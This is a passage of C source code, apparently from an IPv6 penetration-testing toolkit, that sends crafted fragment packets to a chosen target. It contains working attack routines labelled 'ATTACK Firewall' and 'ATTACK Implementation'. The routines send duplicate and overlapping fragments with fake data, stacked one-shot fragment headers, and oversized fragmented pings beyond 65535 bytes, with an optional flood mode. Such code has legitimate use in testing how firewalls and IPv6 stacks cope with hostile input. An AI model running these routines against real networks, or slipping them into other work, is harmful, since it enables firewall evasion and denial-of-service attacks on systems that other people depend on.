curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (2nd real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data and ttl=1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 1, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (1st real, 2nd ttl 1)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data and ttl=1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 1, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (1st real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (2nd real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data after completion\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping third fragment into second with valid data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment overlapping into second\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101 - 128 / 8, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808 - 128, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping third fragment into second\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); memset(buf + 400 - 128, 'Z', 128); // bad data we overwrite in next packet if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment overlapping into second\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101 - 128 / 8, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808 - 128, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping second fragment into third\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending third and final fragment - but not the last\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); memset(buf, 'Z', 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment overlapping into third\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - one shot fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xfacebabe + count + curr) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, sizeof(bla), 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - double one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending double one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xaaaa0000 + count + curr) < 0) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xbbbb0000 + count + curr) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, sizeof(bla), 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - 137 one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 137 one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 137; i++) if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xffff0000 + i + count + (curr << 7)) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, 120, 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - 175 one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 180 one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 175; i++) if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xffff0000 + i + count + (curr << 7)) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, 8, 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65486 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65486, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65495 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65495, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65535 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65535, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 66920 bytes in 47 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 47 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 66920, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1438 - offset); // ignore return code if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - replacing fragments with new, different data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = 